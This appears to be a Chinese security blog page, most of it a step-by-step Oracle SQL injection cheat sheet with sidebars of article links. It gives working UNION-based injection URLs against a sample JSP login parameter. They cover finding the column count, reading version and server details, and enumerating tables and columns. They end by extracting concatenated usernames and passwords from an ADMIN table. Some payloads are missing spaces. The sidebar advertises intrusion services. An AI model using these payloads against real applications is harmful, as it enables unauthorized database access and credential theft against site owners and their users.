1、注释符号
-- 空格 单行注释
/* */ 多行注释
2、判断是否注入
and 1=1 --
and 1=2 --
3、列数
order by
http://www.jsporcle.com/a.jsp?username=SMITH'order by 8 –
4、联合查询
因为oracle 对列的类型比较严谨 所以 要用null 可以匹配任意类型
Oracle中的dual表是一个单行单列的虚拟表
Dual 是 Oracle中的一个实际存在的表,任何用户均可读取。
所以可以通过这个dual表 来显示列数。
http://www.jsporcle.com/a.jsp?username=SMITH%27union select null,null,null,null,null,null,null,null from dual --
5、获取Oracle信息
oracle 版本信息
http://www.jsporcle.com/a.jsp?username=SMITH’union select null,null,(select banner from sys.v_$version whererownum=1),null,null,null,null,null from dual –
1 当前用户权限(select * from session_roles)
2 当前数据库版本( select banner from sys.v_$version whererownum=1)
3 服务器出口IP (用utl_http.request 可以实现)
4 服务器监听IP (select utl_inaddr.get_host_address from dual)
5 服务器操作系统(select member from v$logfile where rownum=1)
6 服务器sid (select instance_name from v$instance)
7 当前连接用户(select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)
6当前用户(SELECT user FROM dual)
6、查询库名
http://www.jsporcle.com/a.jsp?username=99%27union select null,null,(select owner from all_tables whererownum=1),null,null,null,null,null from dual --
http://www.jsporcle.com/a.jsp?username=99%27union select null,null,(select owner from all_tables where rownum=1 and owner<>'SYS' ),null,null,null,null,null from dual --
7、查询表
表 一定要是大写的
查询第一个表
http://www.jsporcle.com/a.jsp?username=SMITH'union select null,null,(select table_name from user_tables whererownum=1),null,null,null,null,null from dual --
查询第二个表
http://www.jsporcle.com/a.jsp?username=SMITH'union select null,null,(select table_name from user_tables where rownum=1 andtable_name<>'ADMIN'),null,null,null,null,null from dual --
8、查询列
查询 表 ADMIN第一个列
http://www.jsporcle.com/a.jsp?username=SMITH'union select null,(select column_name from user_tab_columns wheretable_name='ADMIN' and rownum=1),null,null,null,null,null,null from dual --
第二个列
http://www.jsporcle.com/a.jsp?username=SMITH' union selectnull,(select column_name from user_tab_columns where table_name='ADMIN' andcolumn_name<>'ID' and rownum=1),null,null,null,null,null,null from dual --
查询表ADMIN 第三个列
http://www.jsporcle.com/a.jsp?username=SMITH' union selectnull,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID'and column_name<>'USERNAME' and rownum=1),null,null,null,null,null,nullfrom dual --
ID USERNAMEPASSWORD
9、查询数据
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(SELECTCONCAT(USERNAME,PASSWORD) FROM ADMIN),null,null,null,null,null,null from dual --
10、扩展
当前用户:
SELECT user FROM dual;
列出所有用户:
SELECT username FROM all_users ORDER BYusername;
列出数据库
SELECT DISTINCT owner FROM all_tables;
列出表名:
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
查询表所有列
SELECT column_name FROM all_tab_columns WHERETABLE_NAME='ADMIN';
定位文件
SELECT name FROM V$DATAFILE;
猜你还喜欢
- 07-08八年专业安全团队承接渗透入侵维护服务
- 08-06SQLMAP的注入命令以及使用方法
- 08-03白帽故事汇:网络安全战士从来不是「男生」的专利
- 07-27编辑器漏洞手册
- 07-12web安全之如何全面发现系统后台
- 02-22常见Web源码泄露总结
- 07-25网站后台登陆万能密码
- 07-23破解emlog收费模板“Begin”
- 01-12批量检测SQL注入
- 01-22Apache Solr远程代码执行漏洞(CVE-2017-12629)从利用到入侵检测
- 随机文章
-
- ARP欺骗绕过Android TV BOX分析
- JShielder:一款自动化Linux服务器安全增强工具
- 浅谈MSF渗透测试
- Ogg音频格式文件的样本构造(CVE-2018-5146)
- 利用CobaltStrike捆绑后门的艺术
- 论Nmap中一些常用的NSE脚本
- Project-Black:渗透中进行Scope控制或扫描和进度追踪的工具
- web.config文件上传技术研究
- 使用Google进行批量SQL注入扫描
- Findomain:一款基于透明日志来搜索子域名的跨平台工具
- 挖洞经验 | 绕过WAF限制利用php:方法实现OOB-XXE漏洞利用
- 用Golang打造一款便携式网络拓扑可视化的工具
- 漏洞扫描技巧之Web漏洞扫描器研究
- HTTP被动扫描代理的那些事
- 针对MySQL数据库的勒索病毒预警
- Google.org点击劫持DOM XSS
- 记一次QQ本地快捷登录漏洞复现
- 当SQL注入遇到诡异的编码问题
- WordPress插件中的XSS漏洞的复现分析与利用
- phpStudy后门简要分析
- 热门文章
-
- 八年专业安全团队承接渗透入侵维护服务
- Emlog黑客站模板“Milw0rm”发布
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 渗透测试培训(第五期)
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
文章存档
- 2021年3月(4)
- 2020年12月(4)
- 2020年11月(5)
- 2020年10月(8)
- 2020年9月(8)
- 2020年8月(20)
- 2020年7月(47)
- 2020年6月(70)
- 2020年5月(41)
- 2020年4月(21)
- 2020年3月(120)
- 2020年2月(26)
- 2019年12月(12)
- 2019年11月(13)
- 2019年10月(17)
- 2019年9月(15)
- 2019年8月(13)
- 2019年7月(15)
- 2019年6月(15)
- 2019年5月(19)
- 2019年4月(23)
- 2019年3月(19)
- 2019年2月(11)
- 2019年1月(29)
- 2018年12月(24)
- 2018年11月(56)
- 2018年10月(79)
- 2018年9月(20)
- 2018年8月(17)
- 2018年7月(16)
- 2018年6月(7)
- 2018年5月(10)
- 2018年3月(6)
- 2018年2月(2)
- 2018年1月(11)
- 2017年11月(18)
- 2017年10月(6)
- 2017年9月(8)
- 2017年8月(7)
- 2017年7月(7)
- 2017年6月(15)
- 2017年5月(30)
- 2017年4月(7)
- 2017年3月(1)
- 2017年2月(4)
- 2017年1月(1)
- 2016年12月(3)
- 2016年11月(7)
- 2016年10月(6)
- 2016年9月(6)
- 2016年8月(102)
- 2016年7月(24)
- 2013年7月(1)
- 文章标签
-